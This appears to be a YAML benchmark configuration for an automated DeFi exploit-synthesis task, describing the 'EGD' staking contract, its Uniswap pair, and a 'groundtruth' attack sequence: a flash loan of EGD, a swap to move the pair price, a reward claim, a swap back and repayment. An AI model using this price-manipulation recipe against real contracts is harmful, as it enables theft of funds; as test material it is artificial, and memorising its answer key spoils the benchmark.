# Information for benchmarks building.
project_name: "EGD"

ctrt_name2cls:
  - ["egd", "EGD"]
  - ["usdt", "USDT"]
  - ["pair", "UniswapV2Pair"]
  - ["factory", "UniswapV2Factory"]
  - ["router", "UniswapV2Router"]
  - ["egdstaking", "EGDStaking"]

ctrt_name2deploy:
  - ["egd", "new EGD()"]
  - ["usdt", ""]
  - ["pair", ""]
  - ["factory", ""]
  - ["router", ""]
  - [
      "egdstaking",
      "new EGDStaking(
      address(egd),
      address(usdt),
      address(router),
      address(pair))",
    ]

extra_actions:
  - "function transaction_egdstaking_egd(uint256 amount) internal {
    egdstaking.claimAllReward();
    }"

extra_deployments_before:
  - "egd.afterDeploy(owner, attacker, address(pair), address(egdstaking));"

extra_deployments:
  - "usdt.transfer(attacker, 100 ether);"
  - "attackContract.setUp(address(usdt), address(egdstaking));"

extra_statements:
  - "vm.warp(block.timestamp + 60 * 60 * 24 * 10);"

attack_goal_str: "usdt"

groundtruth:
  - ["borrow", "egd", "5000000000e18"]
  - ["swap", "pair", "egd", "usdt", "egd.balanceOf(attacker)"]
  - ["transaction", "egdstaking", "egd", "0"]
  - ["swap", "pair", "usdt", "egd", "400000e18"]
  - ["payback", "egd", "5000000000e18 * 1003 / 1000"]

# Information for search space building.
roles:
  "usdt":
    is_asset: true
    is_erc20: true
    is_stablecoin: true
  "egd":
    is_asset: true
    is_erc20: true
    is_stablecoin: false
  "pair":
    is_swappair: true
    uniswap_order: ["egd", "usdt"]
    support_swaps:
      "usdt": ["egd", "usdt"]
      "egd": ["egd", "usdt"]
    is_oracle: true
    oracle: "pair"
  "egdstaking":
    is_defientry: true
    hacked_assets: ["egd"]

pattern: "BuySell Manipulation"
